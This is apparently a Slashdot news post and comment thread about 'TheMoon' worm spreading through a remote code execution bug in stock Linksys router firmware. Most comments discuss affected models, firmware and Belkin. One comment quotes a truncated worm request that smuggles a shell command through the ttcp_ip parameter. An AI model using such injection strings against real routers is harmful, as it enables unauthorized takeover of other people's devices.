Linksys Routers Exploited By "TheMoon" 134
UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"
Model Numbers of affected devices. (Score:5, Informative)
Re: That's impossible (Score:5, Informative)
Slow your roll there, not all linksys run linux. Most run vxworks rtos. Only the linksys routers flashed with ddwrt firmware run linux for sure.
Re:That's impossible (Score:5, Informative)
Only affecting models not running Linux currently...
Re:Default firmware only? (Score:5, Informative)
The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd
It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.
Actually Belkin bought them from Cisco (Score:5, Informative)
Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.
and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.
Re:Is dd-wrt affected? (Score:5, Informative)
no, it's just the default firmware.
"Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
from the comments on https://isc.sans.edu/forums/di... [sans.edu]
Re:That's impossible (Score:3, Informative)
As a result, there are now two brands of hardware that I will refuse to purchase. I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."
I have a few of their surge suppressors, but generally anything with the Belkin name doesn't come into my house after that experience. Also, I'll never buy one of their PDUs for the datacenter - if their consumer support is that bad, why would I trust them in the enterprise?
Dear Businesses: Enterprise purchasing decisions are made by people who are also consumers who buy stuff for their homes.